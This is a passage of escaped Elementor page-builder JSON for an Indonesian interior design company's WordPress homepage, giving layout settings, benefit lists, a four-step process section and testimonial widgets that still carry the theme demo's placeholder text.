projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Berikut alasan banyak yang memilih Bauhaus\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\